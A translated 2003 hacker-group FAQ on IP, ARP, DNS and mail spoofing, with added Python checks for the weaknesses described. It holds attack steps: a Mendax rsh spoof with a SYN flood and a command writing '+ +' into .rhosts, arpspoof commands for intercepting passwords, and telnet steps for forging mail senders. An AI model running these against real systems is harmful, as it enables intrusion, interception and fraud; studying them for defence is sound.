Continued:
=======
This has been translated from German to English. Some parts are still in German; I will update it when I get the chance. You can find the thread here <<, as well as the tools, source, etc. (to be updated).
The German Computer Freaks
www.gcf.de, since 1997
--------------------------------------------------------------------------------
Spoofing FAQ
Author: Flo
Mail: flo@ec-security.com
--------------------------------------------------------------------------------
1. What is Spoofing?
2. IP Spoofing
3. ARP Spoofing
4. DNS Spoofing
5. Mail Spoofing
6. Conclusion
1. What is Spoofing?
In the traditional sense, spoofing means that an attacker forges packets so that they carry the source address of another (sometimes trusted) host. Nowadays this definition is considered no longer up to date. The old definition has been extended and now covers all methods by which authentication and identification procedures based on trusted addresses or host names can be undermined.
In the following I want to shed some light on a few spoofing techniques. These include:
- IP Spoofing
- ARP Spoofing
- DNS Spoofing
- Mail Spoofing
2. IP Spoofing
Probably the best-known spoofing technique, which among other things served Kevin Mitnick, probably the best-known cracker in the world, well. In general, IP spoofing can be defined as a technique for faking a false source address, usually with the intention of being authenticated by means of the spoofed source address. To begin with, a few fundamental things:
3-Way Handshake:
The procedure for establishing a TCP connection is called the 3-way handshake, since it always runs in 3 steps.
Client (trusted host): Cl
Server: Sv
TCP packet with SYN flag set: S
TCP packet with ACK flag set: A
TCP packet with SYN/ACK flags set: S/A
Initial Sequence Number: ISN
Cl -- S, ISN(Cl) --> Sv
Sv -- S/A, ISN(Sv), ISN(Cl) --> Cl
Cl -- A, ISN(Sv) --> Sv
TCP flags:
Every packet in a normal TCP connection has a clear function. Therefore at least one flag is set in every packet of a normal TCP connection. The TCP flags are part of the TCP header. Here I will deal with only 2 of these flags:
on the one hand the synchronisation flag (SYN) and on the other hand the acknowledgement flag (ACK). In the 3-way handshake the client first sends a TCP packet with the SYN flag set to the server, in order to tell it that it would now like to establish a connection with the server (Cl: "I would like to establish a connection with you!"). When the server receives this packet, it answers with a TCP packet with the SYN/ACK flags set (Sv: "OK, no problem. Did you understand me?"). When the client in turn receives this packet, it sends an ACK packet to the server in order to complete the connection (Cl: "Yes, understood!"). Now the connection is fully established and data can be exchanged within the session.
Sequence numbers:
In general, sequence numbers have to fulfil 2 tasks within a TCP connection:
- missing packets can be detected and retransmitted later
- the correct order of the packets can be restored
Case example:
The attacker now tries to switch off the client (Cl) and then to assume its IP address. Switching off the client can be achieved with a Denial of Service (DoS) attack. But now comes the hardest part:
The attacker, who now pretends to have the client's IP address, sends a SYN packet to the server (Sv), whereupon the server sends a SYN/ACK packet with the required ISN(Sv) into the void, since the client has been put out of action by the attacker. The attacker must now guess ISN(Sv), which he has to send in an ACK packet in order to complete the connection. For this he first establishes a normal, unprivileged connection to the server (Sv) in order to obtain its current ISN. Now the attacker must calculate the required ISN as quickly as possible, which is by no means impossible, since there is a certain pattern in the generation of an ISN:
- the ISN is increased by 128000 every second if no connections are established
- the ISN is increased by 64000 every second if a connection is established
Note: This technique is therefore called blind IP spoofing.
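The fixed-increment behaviour above is what makes blind spoofing possible, and it is also easy to test for on one's own hosts. The following Python check is an added example, not part of the original FAQ or of any tool it names: it takes timestamped ISN samples (constructed here, following the 128000-per-second rule from the text) and reports whether the generator looks predictable.

```python
import random
from statistics import pstdev

# Per-second ISN step for an idle host, as stated in the text (assumed BSD-style generator).
IDLE_STEP_PER_SEC = 128000

def isn_increments(samples):
    """samples: list of (seconds, isn) taken from successive connections of one's own
    to the host under test. Returns the ISN increase per second between consecutive
    samples, computed modulo 2**32 because the ISN wraps."""
    rates = []
    for (t0, isn0), (t1, isn1) in zip(samples, samples[1:]):
        dt = t1 - t0
        if dt <= 0:
            raise ValueError("samples must be strictly increasing in time")
        rates.append(((isn1 - isn0) % 2**32) / dt)
    return rates

def isn_looks_predictable(samples, tolerance=0.05):
    """True when the increments are almost constant: someone who has seen one ISN
    and knows the elapsed time could then compute the next one, which is the
    precondition of the blind spoofing described above. tolerance is the relative
    spread of the rates that is still accepted as 'constant'."""
    rates = isn_increments(samples)
    mean = sum(rates) / len(rates)
    if mean == 0:
        return False
    return pstdev(rates) / mean < tolerance

def constructed_fixed_step_samples(start=1_000_000, n=6):
    # Constructed data: the ISN grows by 128000 per idle second, as the text states.
    return [(float(i), (start + i * IDLE_STEP_PER_SEC) % 2**32) for i in range(n)]

def constructed_random_samples(n=6, seed=7):
    # Constructed data: a generator that draws a fresh random 32-bit ISN each time.
    rng = random.Random(seed)
    return [(float(i), rng.getrandbits(32)) for i in range(n)]

if __name__ == "__main__":
    print("fixed-step generator predictable:", isn_looks_predictable(constructed_fixed_step_samples()))
    print("random generator predictable:", isn_looks_predictable(constructed_random_samples()))
```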
Case example Mendax:
Mendax is a simple tool that can be used for predicting TCP sequence numbers and for rshd spoofing. After Mendax has been compiled and run, one sees this on the screen:
$ ./mendax
-p PORT       first port on localhost to occupy
-s PORT       server port on <source> to flood
-l username   user on <source>
-r username   user on <target>
-C COMMAND    command to execute
-w PORT       wait for a TCP SYN packet on port PORT
-D            read data from stdin and send it
-t            test whether the attack might succeed
-L TERM       spoof rlogind instead of rshd
-S PORT       port from which to sample sequence numbers
In this example I use 3 fictitious computers:
- 80.20.30.40 as attacker
- 80.20.30.41 as victim
- 80.20.30.42 as the computer whose address the attacker pretends to have
On the victim's computer (80.20.30.41) there is a hosts.equiv file that permits rsh traffic from 80.20.30.42 (trusted host):
# /etc/hosts.equiv
localhost
80.20.30.42
The attacker's goal is now to execute rsh commands on 80.20.30.41 (victim) as a user of 80.20.30.42 (trusted host), although he actually has the IP address 80.20.30.40. If Mendax now reports that the target host (80.20.30.41) is vulnerable, any desired command can be executed on it. The standard command that is sent to the victim (80.20.30.41) is the following:
mv .rhosts r; echo + + > .rhosts
Thus the file .rhosts is created on 80.20.30.41 (victim), which makes it possible for anyone to log in from any host.
Now the attacker (80.20.30.40) sends the following command:
$ ./mendax -p 514 80.20.30.42 80.20.30.41 -l test -r test
This command instructs Mendax to simulate an rsh request from 80.20.30.42 (trusted host) to the rshd on the victim's host (80.20.30.41) as user test. In addition, Mendax puts the trusted host (80.20.30.42) out of action with a Denial of Service (DoS) attack. In this example Mendax uses SYN flooding, with the source address of the SYN packets forged:
flooding SOURCE with TCP SYN packets from 1.2.3.4
Mendax then analyses how the victim's host (80.20.30.41) generates its sequence numbers. Once it has found out how the victim's sequence numbers are generated, Mendax spoofs rsh and tries to execute the command:
using 64000 as prediction difference (3 hit).
spoofing rsh.
resetting TCP target connection: .
resetting SOURCE: ...................
After this command has been executed, the file .rhosts exists in the home directory of user test on 80.20.30.41 (victim). If one looks at the contents of the file, it becomes clear that now anyone can access the victim's host. A simple cat .rhosts shows the contents of this file:
+ +
Vulnerable services/configurations:
- all r-services (e.g. rsh)
- all services/configurations that use IP-address-based authentication
- Remote Procedure Call (RPC)
- the X Window System
Countermeasures:
- no authentication by source address
- use of SSH (Secure Shell), which makes such authentication unnecessary
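A defender can check for the trust configuration this attack relies on. The following Python audit is an added example, not part of the original FAQ: it parses hosts.equiv/.rhosts lines (host, optional user, '+' wildcard, '-' negation, '@netgroup') and flags address-based trust as well as the '+ +' entry that Mendax writes. The file contents are constructed from the example above.

```python
import ipaddress

def parse_rhosts_line(line):
    """One hosts.equiv/.rhosts line: '[+|-]host [ [+|-]user ]'; '#' starts a comment.
    Returns (host, user) or None for blank and comment lines."""
    line = line.split("#", 1)[0].strip()
    if not line:
        return None
    fields = line.split()
    return fields[0], (fields[1] if len(fields) > 1 else None)

def audit_rhosts(text, path="(constructed)"):
    """Return (severity, message) findings for the given file contents."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parsed = parse_rhosts_line(raw)
        if parsed is None:
            continue
        host, user = parsed
        where = f"{path}:{lineno}"
        if host == "+" and user == "+":
            findings.append(("critical", f"{where}: '+ +' lets any user on any host in"))
        elif host == "+":
            findings.append(("critical", f"{where}: any host trusted for user {user or 'same name'}"))
        elif user == "+":
            findings.append(("high", f"{where}: any user on {host} trusted"))
        elif host.startswith(("-", "@", "+@")):
            continue  # negated entry or netgroup: not plain address-based trust, not checked here
        else:
            try:
                ipaddress.ip_address(host)
                findings.append(("high", f"{where}: trust by IP address {host} (IP spoofable)"))
            except ValueError:
                findings.append(("medium", f"{where}: trust by host name {host} (DNS or IP spoofable)"))
    return findings

def worst_severity(findings):
    order = {"critical": 3, "high": 2, "medium": 1}
    return max((sev for sev, _ in findings), key=order.get, default=None)

# Constructed: the victim's hosts.equiv from the text, and the .rhosts that Mendax writes.
HOSTS_EQUIV = "# /etc/hosts.equiv\nlocalhost\n80.20.30.42\n"
RHOSTS_AFTER_ATTACK = "+ +\n"

if __name__ == "__main__":
    for sev, msg in audit_rhosts(HOSTS_EQUIV, "/etc/hosts.equiv") + audit_rhosts(RHOSTS_AFTER_ATTACK, "~test/.rhosts"):
        print(sev, msg)
```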
Tools:
- ipspoof.c
- Mendax
- seq_number.c
3. ARP Spoofing
The Address Resolution Protocol (ARP) is the protocol responsible for mapping hardware addresses to IP addresses. If a host now needs such a mapping, it sends an ARP broadcast containing the IP address of the desired host. To avoid this broadcast there is the ARP cache, in which the ARP information is buffered; it can be displayed with "arp -a".
Interface: 80.134.91.90 on Interface 0x1000002
  Internet Address      Physical Address      Type
  80.132.221.126        20-53-52-43-00-00     dynamic
Example output of arp -a
The goal of ARP spoofing is now to manipulate this ARP cache. With this technique the attacker keeps his own hardware address but wants to take on the IP address of a trusted host. To do this, the attacker manipulates his victim's cache by sending false mapping information. If the attack succeeds, from then on all of the target's packets for the trusted host are directed to the attacker's hardware address, because the target believes the attacker's computer is the trusted host.
Case example arpspoof:
As the name already says, arpspoof is a tool developed for ARP spoofing. arpspoof is part of the dsniff package. But now to the essentials:
Here I again use 3 fictitious systems, which are connected via a network switch:
- the system gate with the IP address 10.1.1.1 acts as the default gateway
- the system evil with the IP address 10.1.1.5 acts as the attacker
- the system victim with the IP address 10.1.1.6 acts as the victim
First, the attacker (evil) needs the hardware addresses of the systems gate and victim, which are required to run arpspoof. To obtain them, evil (10.1.1.5) has to run two ping commands:
[evil] ping gate
PING 10.1.1.1 from 10.1.1.5: 56(84) bytes of data.
64 bytes from 10.1.1.1: icmp_seq=0 ttl=128 time=1.3 ms
[evil] ping victim
PING 10.1.1.6 from 10.1.1.5: 56(84) bytes of data.
64 bytes from 10.1.1.6: icmp_seq=0 ttl=128 time=5.1 ms
Before the attacker can begin, the system evil should be able to forward all data, so that the intercepted data still reaches its destination. Simple IP forwarding can be activated with the tool fragrouter and its -B1 option.
[evil] fragrouter -B1
Now it can start. The attacker runs the following command:
[evil] arpspoof -t 10.1.1.6 10.1.1.1
With this command the whole data traffic from victim (10.1.1.6) to gate (10.1.1.1) is redirected through the attacker's system (evil). He can now record the traffic with the sniffer of his choice and thus, for example, obtain passwords.
Disadvantages:
- The cache entries usually lose their validity too quickly. The attacker therefore has to manipulate the victim's ARP cache again periodically.
- Intelligent hardware (routers, switches) can render such attacks ineffective.
Countermeasures:
- Static configuration of the mappings (address assignments). This can be done with the tool arp:
arp -s hostname hw_address
- Use of the tool Arpwatch. It watches for changes in the IP/Ethernet mappings. If the program notices a change, one is alerted by e-mail. In addition, the manipulations are logged.
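What Arpwatch does can be shown in a few lines. The following Python check is an added example, not Arpwatch's or dsniff's code: it parses two "arp -a" snapshots taken on the victim (constructed here in the layout shown above, with placeholder MAC addresses from the documentation range) and reports every IP whose hardware address changed, the MACs now shared by several IPs, and the arp -s lines that would pin the original mapping.

```python
import re

# One 'arp -a' row: IP, MAC (hyphen or colon separated), type.
ARP_ROW = re.compile(r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+(\w+)")

def parse_arp_table(output):
    """Map IP -> normalized MAC from 'arp -a' output; Interface/header lines are skipped."""
    table = {}
    for line in output.splitlines():
        m = ARP_ROW.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower().replace(":", "-")
    return table

def arp_changes(before, after, watched=None):
    """(ip, old_mac, new_mac) for each watched IP whose MAC differs between snapshots.
    With watched=None every IP present in both snapshots is compared."""
    ips = watched if watched is not None else before.keys() & after.keys()
    return [(ip, before[ip], after[ip]) for ip in sorted(ips)
            if ip in before and ip in after and before[ip] != after[ip]]

def shared_macs(table):
    """MACs claimed by more than one IP: the gateway and the attacker sharing one
    hardware address is exactly what a successful arpspoof run looks like."""
    owners = {}
    for ip, mac in table.items():
        owners.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in owners.items() if len(ips) > 1}

def static_arp_commands(baseline, ips):
    """'arp -s' lines that pin the baseline mapping (the static countermeasure above)."""
    return [f"arp -s {ip} {baseline[ip]}" for ip in ips if ip in baseline]

# Constructed snapshots on victim (10.1.1.6) before and after arpspoof ran on evil (10.1.1.5).
# MAC addresses are placeholders from the 00-00-5e-00-53-xx documentation range.
SNAPSHOT_BEFORE = """\
Interface: 10.1.1.6 on Interface 0x1000002
  Internet Address      Physical Address      Type
  10.1.1.1              00-00-5e-00-53-01     dynamic
  10.1.1.5              00-00-5e-00-53-05     dynamic
"""
SNAPSHOT_AFTER = SNAPSHOT_BEFORE.replace("00-00-5e-00-53-01", "00-00-5e-00-53-05")

def detect_gateway_spoof(gateway="10.1.1.1"):
    before, after = parse_arp_table(SNAPSHOT_BEFORE), parse_arp_table(SNAPSHOT_AFTER)
    return arp_changes(before, after, [gateway]), shared_macs(after)
```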
Tools:
- arpspoof (part of dsniff)
- Arpwatch
- Ettercap
- fragrouter
4. DNS Spoofing
The Domain Name System (DNS) is responsible for mapping IP addresses to host names and vice versa. In this spoofing technique the attacker breaks into the DNS server and changes the mapping tables of host names and IP addresses there. These changes are written into the databases holding the translation tables on the DNS server. If a client now requests the resolution of a host name, it receives a forged address, namely the IP address of a computer under the attacker's control. However, this kind of spoofing occurs rather rarely.
Countermeasures:
- Use of the script utility DOC (Domain Obscenity Control)
Tools:
- DOC
- ERECT
- jizz
5. Mail Spoofing
Mail spoofing means sending a mail with a faked sender address. To write a mail with a forged sender address, follow these steps:
Case example Telnet:
1. telnet mailserver 25 (enter the address of the anonymous SMTP server instead of mailserver)
2. To identify ourselves we enter the command HELO ID, where it does not matter at all what one enters for ID.
3. MAIL FROM: <absenderadresse@gefaked>
4. RCPT TO: <empfaenger@dermail>
5. DATA
6. Subject: subject
7. Now you can enter your message.
8. . (yes, a single dot)
9. QUIT
However, there are only very few anonymous mail servers left, so one can search for quite a long time before finding one. The alternative is to set up one's own anonymous SMTP server on one's PC.
6. Closing Words:
As the author of this document I accept no liability whatsoever for the actions of readers. I thank the people who encouraged me to write this. I also thank the authors of the books that inspired me on this topic.
Greets to:
Neonomicus
Marc Ruef
Daniel B.
--------------------------------------------------------------------------------
© 2003 by Flo
visit www.gcf.de & www.ec-security.com